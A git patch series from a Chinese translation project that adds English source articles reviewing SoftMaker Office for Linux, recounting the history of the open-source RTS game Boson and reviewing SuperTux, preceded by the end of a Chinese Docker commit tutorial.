+### 保存容器状态
+
+容器运行并更改后后(比如安装了 apache 服务器),我们可以保存容器状态。这会在本地系统上保存新创建镜像。
+
+运行下面语句来提交并保存容器状态
+
+```
+$ docker commit 85475ef774 repository/image_name
+```
+
+这里,**commit** 会保存容器状态
+
+ **85475ef774**,是容器的容器 id,
+
+ **repository**,通常为 docker hub 上的用户名 (或者新加的仓库名称)
+
+ **image_name**,新镜像的名称
+
+我们还可以使用 `-m` 和 `-a` 来添加更多信息。通过 `-m`,我们可以留个信息说 apache 服务器已经安装好了,而 `-a` 可以添加作者名称。
+
+ **像这样**
+
+```
+ docker commit -m "apache server installed"-a "Dan Daniels" 85475ef774 daniels_dan/Cent_container
+```
+
+我们的教程至此就结束了,本教程讲解了一下 Docker 中的那些重要的命令,如有疑问,欢迎留言。
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/important-docker-commands-beginners/
+
+作者:[Shusain][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/create-first-docker-container-beginners-guide/
From 2ff446faa2c7b42a53b28b6a0f625f07cf44683a Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 18:53:39 +0800
Subject: [PATCH 196/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20SoftMaker=20for?=
=?UTF-8?q?=20Linux=20Is=20a=20Solid=20Microsoft=20Office=20Alternative?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Is a Solid Microsoft Office Alternative.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md
diff --git a/sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md b/sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md
new file mode 100644
index 0000000000..6d00745e7d
--- /dev/null
+++ b/sources/tech/20171227 SoftMaker for Linux Is a Solid Microsoft Office Alternative.md
@@ -0,0 +1,138 @@
+SoftMaker for Linux Is a Solid Microsoft Office Alternative
+======
+![](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-softmaker-office-2018-1.jpg)
+
+
+[SoftMaker Office][6] could be a first-class professional-strength replacement for Microsoft Office on the Linux desktop.
+
+The Linux OS has its share of lightweight word processors and a few nearly worthy standalone spreadsheet apps, but very few high-end integrated office suites exist for Linux users. Generally, Linux office suites lack a really solid slide presentation creation tool.
+
+![PlanMaker Presentations][7]
+
+PlanMaker Presentations is a near-perfect Microsoft Powerpoint clone.
+
+Most Linux users opt for [LibreOffice][9] -- or maybe the withering [OpenOffice][10] -- or online subscriptions to Microsoft Office through Web browser apps.
+
+However, high-performing options for Linux office suites exist. The SoftMaker office suite product line is one such contender to replace Microsoft Office.
+
+The latest beta release of SoftMaker Office 2018 is fully compatible with Microsoft Office. It offers a completely redesigned user interface that allows users to work with either classic or ribbon menus.
+
+![SoftMaker UI Panel][11]
+
+On first use, you choose the user interface you prefer. You can change your default option at any time from the UI Panel in Settings.
+
+SoftMaker offers a complete line of free and paid office suite products that run on Android devices, Linux distros, and Windows or macOS PCs.
+
+![][12]
+
+### Rethinking Options
+
+The beta version of this commercial Linux office suite is free. When the final version is released, two Linux commercial versions will be available. The licenses for both let you run SoftMaker Office on five computers. It will be priced at US$69.95, or $99.95 if you want a few dictionary add-on tools included.
+
+Check out the free beta of the commercial version. A completely free open source-licensed version called "SoftMaker FreeOffice 2018," will be available soon. Switching is seamless. The FreeOffice line is distributed under the Mozilla Public License.
+
+The FreeOffice 2018 release will have the same ribbon interface option as SoftMaker Office 2018. The exact feature list is not finalized yet, according to Sales Manager Jordan Popov. Both the free and the paid versions will contain fully functional TextMaker, PlanMaker, and Presentations, just like the paid Linux SoftMaker Office 2018 release. The Linux edition has the Thunderbird email management client.
+
+When I reviewed SoftMaker FreeOffice 2016 and SoftMaker Office 2016, I found the paid and free versions to be almost identical in functionality and features. So opting for the free versus paid versions of the 2018 office suites might be a no-brainer.
+
+The value here is that the free open source and both commercial versions of the 2018 releases are true 64-bit products. Previous releases required some 32-bit dependencies to run on 64-bit architecture.
+
+### First Look Impressive
+
+The free version (FreeOffice 2018 for Linux) is not yet available for review. SoftMaker expects to release FreeOffice 2018 for Linux it at the end of the first quarter of 2018.
+
+So I took the free beta release of Office 2018 for a spin to check out the performance of the ribbon user interface. Its performance was impressive.
+
+I regularly use the latest version of LibreOffice and earlier versions of FreeOffice. Their user interfaces mimic standard drop-down menus.
+
+It took me some time to gegt used to the ribbon menu, since I was unfamiliar with using it on Microsoft Office, but I came to like it.
+
+### How It Works
+
+The process is a bit different than scrolling down drop-down menus. You click on a category in the toolbar row at the top of the application window and then scan across the lateral display of boxed lists of functions.
+
+The lateral array of clickable menu choices changes with each toolbar category selected. Once I learned what was where, my appreciation for the "ribbon effect" grew.
+
+![TextMaker screen shot][13]
+
+The ribbon interface gives users a different look and feel when creating or editing documents on the Linux desktop.
+
+The labels are: File, Home, Insert, Layout, References, Mailings, Review and View. Click the action you want and instantly see it applied. There are no cascading menus.
+
+At first, I did not like not having any customizations available for things like often-used actions. Then I right-clicked on an item in the ribbon and discovered a pop-up menu.
+
+This provides a way to customize a Quick Action Bar, customize the ribbon display choices, and show the Quick Action toolbar as a separate toolbar. That prompted me to sit up straight and dig in with eyes wide open.
+
+### Great User Experience
+
+I process a significant number of graphics-heavy documents each week that are produced with Microsoft Office. I edit many of these documents and create many more.
+
+Much of my work goes to users of Microsoft Office. LibreOffice and SoftMaker Office applications have little to no trouble handling native Microsoft file formats such as DOCX, XLSX and PPTX.
+
+LibreOffice formatting -- both on screen and printed versions -- are well-done most times. SoftMaker's document renderings are even more exact.
+
+The beta release of SoftMaker Office 2018 for Linux is even better. Especially with SoftMaker Office 2018, I can exchange files directly with Microsoft Office users without conversion. This obviates the need to import or export documents.
+
+Given the nearly indistinguishable performance between previous paid and free versions of SoftMaker products, it seems safe to expect the same type of performance from FreeOffice 2018 when it arrives.
+
+### Expanding Office Reach
+
+SoftOffice products can give you a complete cross-platform continuity for your office suite needs.
+
+Four Android editions are available:
+
+ * SoftMaker Office Mobile is the paid or commercial version for Android phones. You can find it in Google Play as TextMaker Mobile, PlanMaker Mobile and Presentations Mobile.
+ * SoftMaker FreeOffice Mobile is the free version for Android phones. You can find it in Google Play as the FREE OFFICE version of TextMaker Mobile, PlanMaker Mobile, Presentations Mobile.
+ * SoftMaker Office HD is the paid or commercial version for Android tablets. You can find it in Google Play as TextMaker HD, PlanMaker HD and Presentations HD.
+ * SoftMaker Office HD Basic is the free version for Android tablets. You can find it in Google Play as TextMaker HD Basic, PlanMaker HD Basic and Presentations HD Basic.
+
+
+
+Also available are TextMaker HD Trial, PlanMaker HD Trial and Presentations HD Trial in Google Play. These apps work only for 30 days but have all the features of the full version (Office HD).
+
+### Bottom Line
+
+The easy access to the free download of SoftMaker Office 2018 gives you nothing to lose in checking out its suitability as a Microsoft Office replacement. If you decide to upgrade to the paid Linux release, you will pay $69.95 for a proprietary license. That is the same price as the Home and Student editions of Microsoft Office 365.
+
+If you opt for the free open source version, FreeOffice 2018, when it is released, you still could have a top-of-the-line alternative to other Linux tools that play well with Microsoft Office.
+
+Download the [SoftMaker Office 2018 beta][15].
+
+### Want to Suggest a Review?
+
+Is there a Linux software application or distro you'd like to suggest for review? Something you love or would like to get to know? Please [email your ideas to me][16], and I'll consider them for a future Linux Picks and Pans column. And use the Reader Comments feature below to provide your input! ![][17]
+
+### about the author
+
+![][18] **Jack M. Germain** has been an ECT News Network reporter since 2003. His main areas of focus are enterprise IT, Linux and open source technologies. He has written numerous reviews of Linux distros and other open source software. [Email Jack.][19]
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxinsider.com/story/SoftMaker-for-Linux-Is-a-Solid-Microsoft-Office-Alternative-85018.html
+
+作者:[Jack M. Germain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxinsider.com
+[1]:https://www.linuxinsider.com/images/2008/atab.gif
+[2]:https://www.linuxinsider.com/images/sda/all_ec_134x30.png
+[4]:https://www.linuxinsider.com/adsys/count/10019/?nm=1-allec-ci-lin-1&ENN_rnd=15154948085323&ign=0/ign.gif
+[5]:https://www.linuxinsider.com/images/article_images/linux5stars_580x24.jpg
+[6]:http://www.softmaker.com/en/softmaker-office-linux
+[7]:https://www.linuxinsider.com/article_images/2017/85018_620x358-small.jpg
+[8]:https://www.linuxinsider.com/article_images/2017/85018_990x572.jpg (::::topclose:true)
+[9]:http://www.libreoffice.org/
+[10]:http://www.openoffice.org/
+[11]:https://www.linuxinsider.com/article_images/2017/85018_620x439.jpg
+[12]:https://www.linuxinsider.com/adsys/count/10087/?nm=1i-lin_160-1&ENN_rnd=15154948084583&ign=0/ign.gif
+[13]:https://www.linuxinsider.com/article_images/2017/85018_620x264-small.jpg
+[14]:https://www.linuxinsider.com/article_images/2017/85018_990x421.jpg (::::topclose:true)
+[15]:http://www.softmaker.com/en/softmaker-office-linux-
+[16]:mailto:jack.germain@
+[17]:https://www.ectnews.com/images/end-enn.gif
+[18]:https://www.linuxinsider.com/images/rws572389/Jack%20M.%20Germain.jpg
+[19]:mailto:jack.germain@newsroom.ectnews.comm
From 01817adeac9ab0a0ebfe67883b530daeae792aac Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:02:09 +0800
Subject: [PATCH 197/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Forgotten=20FOSS?=
=?UTF-8?q?=20Games:=20Boson?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20171229 Forgotten FOSS Games- Boson.md | 131 ++++++++++++++++++
1 file changed, 131 insertions(+)
create mode 100644 sources/tech/20171229 Forgotten FOSS Games- Boson.md
diff --git a/sources/tech/20171229 Forgotten FOSS Games- Boson.md b/sources/tech/20171229 Forgotten FOSS Games- Boson.md
new file mode 100644
index 0000000000..7cbbc231b5
--- /dev/null
+++ b/sources/tech/20171229 Forgotten FOSS Games- Boson.md
@@ -0,0 +1,131 @@
+Forgotten FOSS Games: Boson
+======
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/0.10-2-800x445.jpg)
+
+Back in September of 1999, just about a year after the KDE project had shipped its first release ever, Thomas Capricelli announced "our attempt to make a Real Time Strategy game (RTS) for the KDE project" on the [kde-announce][1] mailing list. Boson 0.1, as the attempt was called, was based on Qt 1.4, the KDE 1.x libraries, and described as being "Warcraft-like".
+
+Development continued at a fast pace over the following year. 3D artists and sound designers were invited to contribute, and basic game play (e.g. collecting oil and minerals) started working. The core engine gained much-needed features. A map editor was already part of the package. Four releases later, on October 30, 2000, the release of version 0.5 was celebrated as a major milestone, also because Boson had been ported to Qt 2.2.1 & KDE 2.0 to match the development of the projects it was based on. Then the project suddenly went into hiatus, as it happens so often with ambitious open source game projects. A new set of developers revived Boson one year later, in 2001, and decided to port the game to Qt 3, the KDE 3 libraries and the recently introduced libkdegames library.
+
+![][2]
+
+By version 0.6 (released in June of 2002) the project was on a very good path again, having been extended with all the features players were used to from similar RTS titles, e.g. fog of war, path-finding, units defending themselves automatically, the destruction of a radar/satellite station leading to the disappearance of the minimap, and so on. The game came with its own soundtrack (you had the choice between "Jungle" and "Progressive), although the tracks did sound a bit… similar to each other, and Techno hadn't been a thing in game soundtracks since Command and Conquer: Tiberian Sun. More maps and sound effects tightened the atmosphere, but there was no computer opponent with artificial intelligence, so you absolutely had to play over a local network or online.
+
+Sadly the old websites at and are no longer online, and YouTube was not a thing back then, so most of the old artwork, videos and roadmaps are lost. But the [Sourceforce page][3] has survived, and the [Subversion repository][4] contains screenshots from version 0.7 on and some older ones from unknown version numbers.
+
+### From 2D to 3D
+
+It might be hard to believe nowadays, but Boson was a 2D game until the release of version 0.7 in January of 2003. So it didn't look like Warcraft 3 (released in 2002), but much more like Warcraft 2 or the first five Command & Conquer titles. The engine was extended with OpenGL support and now "just" loaded the existing 3D models instead of forcing the developers to pre-render them into 2D sprites. Why so late? Because your average Linux installation simply didn't have OpenGL support when Boson was created back in 1999. The first XFree86 release to include GLX (OpenGL Extension to the X Window System) was version 4.0, published in 2000. And then it took a while to get OpenGL acceleration working in the major Linux graphics drivers (Matrox G200/G400, NVIDIA Riva TNT, ATI RagePro, S3 ViRGE and Intel 810). I can't say it was trivial to set up a Linux Desktop with hardware accelerated 3D until Ubuntu 7.04 put all the bits together for the first time and made it easy to install the proprietary NVIDIA drivers through the "Additional Drivers" settings dialogue.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/gl_boson1.jpg)
+
+So when Boson switched to OpenGL in January of 2003, that sucked. You now absolutely needed hardware acceleration to be able play it, and well, it was January of 2003. GPUs still used [AGP][5] slots back then, ATI was still an independent company, the Athlon64 would not be released before September 2003, and you were happy if you even owned a GeForce FX or a Radeon 9000 card. Luckily I did, and when I came across Boson, I immediately downloaded it, built it on my Gentoo machine and ran it on my three-monitor setup (two 15″ TFTs and one 21″ CRT). After debugging 3D hardware acceleration for a day or two, naturally…
+
+![][6]
+
+Boson wasn't finished or even really playable back then (still no computer opponent, only a few units working, no good maps etc.), but it showed promise, especially in light of the recent release of Command & Conquer: Generals in February of 2003. The thought of having an actual open source alternative to a recently released AAA video game title was so encouraging that I started to make small contributions, mainly by [reporting bugs][7]. The cursor icon theme I created using Cinema 4D never made it into a release.
+
+### Development hell
+
+Boson went through four releases in 2003 alone, all the way up to version 0.10. Performance was improved, the engine was extended with support for Python scripts, adaptive level of detail, smoke, lighting, day/night switches, and flying units. The 3D models started to look nice, an elementary Artificial Intelligence opponent was added (!), and the list of dependencies grew longer. Release notices like "Don't crash when using proprietary NVidia drivers and no usable font was found (reported to NVidia nearly a year ago)" are a kind reminder that proprietary graphics drivers already were a pain to work with back then, in case anybody forgot.
+
+![][8]
+
+An important task from version 0.10 on was to remove (or at least weaken) the dependencies on Qt and KDE. To be honest I never really got why the whole game, or for that matter any application ever, had to be based on Qt and KDE to begin with. Qt is a very, very intrusive thing. It's not just a library full of cool stuff, it's a framework. It locks you into its concept of what an application is and how it is supposed to work, and what your code should look like and how it is supposed to be structured. You need a whole toolchain with a metacompiler because your code isn't even standard C++.
+
+Every time the Qt/KDE developers decide to break the ABI, deprecate a component or come up with a new and (supposedly) better solution to an existing solution, you have to follow - and that has happened way too often. Just ask the KDE developers how many times they had to port KDE just because Qt decided to change everything for the umpteenth time, and now imagine you depend on both Qt **and** KDE. Pretty much everything Qt offers can be solved in a less intrusive way nowadays.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/buildings0001.png.wm-1024x576.jpg)
+
+Maybe the original Boson developers just wanted to take advantage of Qt's 2D graphics subsystem to make development easier. Or make sure the game can run on more than one platform (at least one release was known to work on FreeBSD). Or they hoped to become a part of the official KDE family to keep the project visible and attract more developers. Whatever the reason might have been, the cleanup was in full swing. aRts (the audio subsystem used by KDE 2 and 3) was replaced by the more standard OpenAL library. [libUFO][9] (which is one of the very few projects relying on the XUL language Mozilla uses to design UIs for Firefox and other application, BTW) was used to draw the on-screen menus.
+
+The release of version 0.11 was delayed for 16 months due to the two main developers being busy with other stuff, but the changelog was very long and exciting. "Realistic" water and environmental objects like trees were added to the maps, the engine learned how to handle wind. The path-finding algorithm and the artificial intelligence opponent became smarter, and everything seemed to slowly come together.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/units0001.png.wm.jpg)
+
+By the time version 0.12 was released eight months later, Boson had working power plants, animated turrets, a new radar system and much more. Version 0.13, the last one to ever be officially released, again shipped an impressive amount of new features and improvements, but most of the changes were not really visible.
+
+Version 0.13 had been released in October of 2006, and after December of the same year the commit rate suddenly dropped to zero. There were only two commits in the whole year of 2007, followed by an unsucessful attempt to revive the project in 2008. In 2011 the "Help wanted" text was finally removed from the (broken) website and Boson was officially declared dead.
+
+### Let's Play Boson!
+
+The game no longer even builds on modern GNU/Linux distributions, mostly due to the unavailability of Qt 3 and the KDE 3 libraries and some other oddities. I managed to install Ubuntu 11.04 LTS in a VirtualBox, which was the last Ubuntu release to have Boson in its repositories. Don't be surprised by how bad the performance is, as far as I can tell it's not the fault of VirtualBox. Boson never ran fast on any kind of hardware and did everything in a single thread, probably losing a lot of performance when synchronizing with various subsystems.
+
+Here's a video of me trying to play. First I enable the eye candy (the shaders) and start one of the maps in the official "campaign" in which I am immediately attacked by the enemy and don't really have time to concentrate on resource collection, only to have the game crash on me before I loose to the enemy. Then I start a map without an enemy (there is supposed to be one, but my units never find it) so I have more time to actually explore all the options, buildings and units.
+
+Sound didn't work in this release, so I added some tracks of the official soundtrack to the audio track of the video.
+
+https://www.youtube.com/embed/18sqwNjlBow?feature=oembed
+
+You can clearly see that the whole codebase was still in full developer mode back in 2006. There are multiple checkboxes for debugging information at the top of the screen, some debugging text scrolls over the actual text of the game UI. Everything can be configured in the Options dialogue, and you can easily break the game by fiddling with internal settings like the OpenGL update interval. Set it too low (the default is 50 Hz), and the internal logic will get confused. Clearly this is because the OpenGL renderer and the game logic run in the same thread, something one would probably no longer do nowadays.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_option_dialogue.png.wm.jpg)
+
+The game menu has all the standard options. There are three available campaigns, each one with its own missions. The mission overview hints that each map could have different conditions for winning and loosing, e.g. in the "Lost Village" mission you are not supposed to destroy the houses in the occupied village. There are ten available colours for the players and three different species: Human, Neutral and "Smackware". No idea where that Name comes from, judging from the unit models it looks like it was just another human player with different units.
+
+There is only a single type of artificial intelligence for the computer opponent. Pretty much all other RTS games offer multiple different opponent AIs. These are either following completely different strategies or are based on a few basic types of AIs which are limited by some external influences, e.g. limiting the rate of resources they get/can collect, or limiting them to certain unit types.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_menu.png.wm-1024x537.jpg)
+
+The game itself does not look very attractive, even with the "realistic-looking" water. Smoke looks okay, but smoke is easy. There is nothing going on on the maps: The ground has only a single texture, the shoreline is very edgy at many points, there is no vegetation except for some lonely trees. Shadows look "wrong"(but enabling them seemed to cause crashes anyways). All the standard mouse and keyboard bindings (assign the selected units to a group, select group, move, attack, etc.) are there and working.
+
+One of the lesser common features is that you can zoom out of the map completely and the engine marks all units with a coloured rectangle. This is something Command & Conquer never had, but games like Supreme Commander did too.
+
+![][10]
+
+![][12]
+
+The game logic is identical to all the other "traditional" Base Building RTS games. You start with a base (Boson calls it the Command Bunker) and optionally some additional buildings and units. The Command Bunker builds all buildings, factory buildings produce units, electrical power or can fight units. Some buildings change the game, e.g. the existence of a Radar will show enemy units on the mini-map even if they are currently inside the fog of war. Some units can gather resources (Minerals and Oil in case of Boson) and bring them to refineries, each unit and building comes at the cost of a defined amount of these resources. Buildings require electrical power. Since war is mostly a game of logistics, finding and securing resources and destroying the opponent before the resources run out is key. There is a "Tech Tree" with dependencies, which prevents you from being able to build everything right from the start. For example advanced units require the existence of a Tech Center or something similar.
+
+There are basically two types of user interfaces for RTS games: In the first one building units and buildings is part of the UI itself. There is a central menu, often at the left or at the right of the screen, which shows all options and when you click one production starts regardless of whether your base or factory buildings are visible on the screen right now or not. In the second one you have to select the your Command Bunker or each of the factories manually and choose from their individual menus. Boson uses the second type. The menu items are not very clear and not easily visible, but I guess once you're accustomed to them the item locations move to muscle memory.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_command_bunker.png.wm-1024x579.jpg)
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_weapons_factory.png.wm-1024x465.jpg)
+
+In total the game could probably already look quiet nice if somebody made a couple of nice maps and cleaned up the user interface. But there is a long list of annoying bugs. Units often simply stop if they encounter an obstacle. Mineral and Oil Harvesters are supposed to shuttle between the location of the resource and a refinery automatically, but their internal state machine seems to fail a lot. Send the collector to a Mineral Mine, it doesn't start to collect. Click around a lot, it suddenly starts to collect. When it it full, it doesn't go back to the refinery or goes there and doesn't unload. Sometimes the whole cycle works for a while and then breaks while you're not looking. Frustrating.
+
+Vehicles also sometimes go through water when they're not supposed to, or even go through the map geometry (!). This points at some major problem with collision detection.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_vehicle_through_geometry.png.wm.jpg)
+
+The win/loose message does look a bit… beta as well 😉
+
+[![][14]][14]
+
+### Why was it never finished?
+
+I think there were many reasons why Boson died. The engine was completely home-grown and lacking a lot in features, testing and performance. The less important subsystems, like audio output, were broken more often than not. There was no "real" focus on getting the basic parts (collecting resources, producing units, fighting battles) fully (!) working before time was spent on less important details like water, smoke, wind etc. Also there were many technical challenges. Most users wouldn't even have been able to enjoy the game even in 2006 due to the missing 3D acceleration on many Linux distributions (Ubuntu pretty much solved that in 2007, not earlier). Qt 4 had been released in 2006, and porting from Qt 3 to Qt 4 was not exactly easy. The KDE project decided to take this as an opportunity to overhaul pretty much every bit of code, leading to the KDE 4 Desktop. Boson didn't really need any of the functionality in either Qt or KDE, but it would have had been necessary to port everything anyways for no good reason.
+
+Also the competition became much stronger after 2004. The full source code for [Warzone 2100][15], an actual commercial RTS game with much more complicated game play, had been released under an open source license in 2004 and is still being maintained today. Fans of Total Annihilation started to work on 3D viewers for the game, leading to [Total Annihilation 3D][16] and the [Spring RTS][17] engine.
+
+Boson never had a big community of active players, so there was no pool new developers could have been recruited from. Obviously it died when the last few developers carrying it along no longer felt it was worth the time, and I think it is clear that the amount of work required to turn the game into something playable would still have been very high.
+
+--------------------------------------------------------------------------------
+
+via: http://www.lieberbiber.de/2017/12/29/forgotten-foss-games-boson/
+
+作者:[sturmflut][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://marc.info/?l=kde-announce&r=1&w=2
+[2]:http://www.lieberbiber.de/wp-content/uploads/2017/03/client8.jpg
+[3]:http://boson.sourceforge.net
+[4]:https://sourceforge.net/p/boson/code/HEAD/tree/
+[5]:https://en.wikipedia.org/wiki/Accelerated_Graphics_Port
+[6]:http://www.lieberbiber.de/wp-content/uploads/2017/03/0.8-1-1024x768.jpg
+[7]:https://sourceforge.net/p/boson/code/3888/
+[8]:http://www.lieberbiber.de/wp-content/uploads/2017/03/0.9-1.jpg
+[9]:http://libufo.sourceforge.net/
+[10]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_1.png.wm-1024x510.jpg
+[11]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_1.png.wm.jpg
+[12]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_maximum_zoom_out.png.wm-1024x511.jpg
+[13]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_maximum_zoom_out.png.wm.jpg
+[14]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_end.png.85.jpg
+[15]:http://wz2100.net/
+[16]:https://github.com/zuzuf/TA3D
+[17]:https://en.wikipedia.org/wiki/Spring_Engine
From 294f3bd7d0b63a5a08fb1dadd9a07c4f0b7ae4c2 Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:07:59 +0800
Subject: [PATCH 198/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20SuperTux:=20A=20L?=
=?UTF-8?q?inux=20Take=20on=20Super=20Mario=20Game?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...erTux- A Linux Take on Super Mario Game.md | 79 +++++++++++++++++++
1 file changed, 79 insertions(+)
create mode 100644 sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
diff --git a/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
new file mode 100644
index 0000000000..ee4dadcc11
--- /dev/null
+++ b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
@@ -0,0 +1,79 @@
+SuperTux: A Linux Take on Super Mario Game
+======
+When people usually think of PC games, they think of big titles, like Call of Duty, which often cost millions of dollars to create. While those games may be enjoyable, there are many games created by amateur programmers that are just as fun.
+
+I am going to review one such game that I love to play. It's called SuperTux.
+
+https://www.youtube.com/embed/pTax8-cdiZU?enablejsapi=1&autoplay=0&cc_load_policy=0&iv_load_policy=1&loop=0&modestbranding=1&rel=0&showinfo=0&fs=1&theme=dark&color=red&autohide=2&controls=2&playsinline=0&
+
+### What is SuperTux
+
+Today, we will take a look at [SuperTux][1]. According to the description on the project's website, SuperTux "is a free classic 2D jump'n run sidescroller game in a style similar to the original [Super Mario games][2] covered under the GNU GPL."
+
+[Suggested read: 30 Best Linux Games On Steam You Should Play in 2018][11]
+
+As you would expect from the title of the game, you play as [Tux][3], the beloved penguin mascot of the Linux kernel. In the opening sequence, Tux is having a picnic with his girlfriend Penny. While Tux dances to some funky beats from the radio, an evil monster named Nolok appears and kidnaps Penny. It's up to Tux to rescue her. (Currently, you are not able to rescue Penny because the game is not finished, but you can still have a lot of fun working your way through the levels.)
+
+![][4]
+
+
+### Gameplay
+
+Playing SuperTux is very similar to Super Mario. You play through different levels to complete a world. Along the way, you are confronted by a whole slew of enemies. The most common enemies are Mr. and Mrs. Snowball, Mr. Iceblock and Mr. Bomb. The Snowballs are this game's version of the Goombas from Super Mario. Mr. Iceblock is the Koopa Troopa of the game. You can defeat him by stomping on him, but if you stomp on him again he will fly across the level taking out other enemies. Be careful because on the way back he'll hit Tux and take a life away. You jump on Mr. Bomb to stun him, but be sure to move on quickly because he will explode. You can find a list of more of Tux's enemies [here][5].
+
+Just like in Super Mario, Tux can jump and hit special blocks to get stuff. Most of the time, these blocks contain coins. You can also find powerups, such as eggs, which will allow you to become BigTux. The other [powerups][6] include Fireflowers, Iceflowers, Airflowers, and Earthflowers. According to the [SuperTux wiki][7]:
+
+> * Fireflowers will allow you to kill most badguys by pressing the action key, which makes Tux throw a fireball
+> * Iceflowers will allow you to freeze some badguys and kill some others by pressing the action key, which makes Tux throw a ball of ice. If they are frozen, you can kill most badguys by butt-jumping on them.
+> * Airflowers will allow you to jump further, sometimes even run faster. However, it can be difficult to do certain jumps as Air Tux.
+> * Earthflowers give you a light. Also, pressing the action key then down will turn you into a rock for a few seconds, which means Tux is completely invulnerable.
+>
+
+
+Occasionally, you will see a bell. That is a checkpoint. If you touch it, you will respawn at that point when you die, instead of having to go back to the beginning. You are limited to three respawns at the checkpoint before you are sent to the beginning of the level.
+
+You are not limited to the main Iceworld map that comes with the game. You can download several extra maps from the developers and the players. The game includes a map editor.
+
+![][8]
+
+### Where to Get SuperTux
+
+The most recent version of SuperTux is 0.5.1 and is available from the [project's website][9]. Interestingly, you can download installers for Windows or Mac or the source code. They don't have any Linux packages to download.
+
+However, I'm pretty sure that SuperTux is in all the repos. I've never had trouble installing it on any distro I've tried.
+
+[Suggested read: Top 10 Command Line Games For Linux][10]
+
+
+### Thoughts
+
+I quite enjoyed playing SuperTux. I never played proper Mario, so I can't really compare it. But, I think SuperTux does a good job of being its own creation.
+
+Tux can move pretty quickly for a penguin. He also tends to slide if he changes direction too quickly. After all, he's moving on ice.
+
+If you want a simple platformer to keep your mind off your troubles for while, this is the game for you.
+
+Have you ever played SuperTux? What is your favorite Tux-based or Linux game? Please let us know in the comments below. If you found this article interesting, please take a minute to share it on social media.
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/supertux-game/
+
+作者:[John Paul][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/john/
+[1]:https://www.supertux.org/index.html
+[2]:https://en.wikipedia.org/wiki/Super_Mario_Bros.
+[3]:https://en.wikipedia.org/wiki/Tux
+[4]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/supertux-home.png
+[5]:https://github.com/SuperTux/supertux/wiki/Badguys
+[6]:https://github.com/SuperTux/supertux/wiki/User-Manual#powerups
+[7]:https://github.com/SuperTux/supertux/wiki/User-Manual
+[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/supertux-map.png
+[9]:https://www.supertux.org/download.html
+[10]:https://itsfoss.com/best-command-line-games-linux/
+[11]:https://itsfoss.com/best-linux-games-steam/
From 74f363b048cf66f9f9ba469bee86a033b88a64fa Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:11:45 +0800
Subject: [PATCH 199/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=205=20arcade-style?=
=?UTF-8?q?=20games=20in=20your=20Linux=20repository?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...de-style games in your Linux repository.md | 98 +++++++++++++++++++
1 file changed, 98 insertions(+)
create mode 100644 sources/tech/20180108 5 arcade-style games in your Linux repository.md
diff --git a/sources/tech/20180108 5 arcade-style games in your Linux repository.md b/sources/tech/20180108 5 arcade-style games in your Linux repository.md
new file mode 100644
index 0000000000..88c4e958d7
--- /dev/null
+++ b/sources/tech/20180108 5 arcade-style games in your Linux repository.md
@@ -0,0 +1,98 @@
